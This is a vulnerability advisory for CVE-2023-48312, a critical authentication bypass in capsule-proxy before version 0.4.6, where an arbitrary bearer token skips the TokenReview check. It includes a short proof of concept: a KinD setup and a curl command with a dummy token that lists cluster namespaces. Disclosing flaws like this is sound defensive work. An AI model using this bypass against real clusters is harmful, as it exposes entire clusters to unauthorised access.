CVE-2023-48312 – github.com/clastix/capsule-proxy

Package

Manager: go
Name: github.com/clastix/capsule-proxy
Vulnerable Version: >=0 <0.4.6

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00065 pctl0.20625

Details

Capsule Proxy Authentication bypass using an empty token The privilege escalation is based on a missing check if the user is authenticated based on the `TokenReview` result. All the clusters running with the `anonymous-auth` Kubernetes API Server setting disable (set to `false`) are affected since it would be possible to bypass the token review mechanism, interacting with the upper Kubernetes API Server. # PoC Start a KinD cluster with the `anonymous-auth` value to `false`. If it is true, it uses anonymous permissions which are very limited by default ```yaml kind: Cluster apiVersion: kind.x-k8s.io/v1alpha4 nodes: - role: control-plane kubeadmConfigPatches: - | kind: ClusterConfiguration apiServer: extraArgs: anonymous-auth: "false" ``` Install `capsule` and `capsule-proxy` ``` k port-forward svc/capsule-proxy 9001 Forwarding from 127.0.0.1:9001 -> 9001 Forwarding from [::1]:9001 -> 9001 Handling connection for 9001 ``` Then query the proxy ``` curl -g -k -H 'Authorization: Bearer f' -X 'GET' 'https://localhost:9001/api/v1/namespaces' ``` # Impact The whole cluster is exposed to unauthorised users. This privilege escalation cannot be exploited if you're relying only on client certificates (SSL/TLS).

Metadata

Created: 2023-11-24T16:53:25Z
Modified: 2023-11-27T22:07:37Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fpvw-6m5v-hqfp/GHSA-fpvw-6m5v-hqfp.json
CWE IDs: ["CWE-287"]
Alternative ID: GHSA-fpvw-6m5v-hqfp
Finding: F039
Auto approve: 1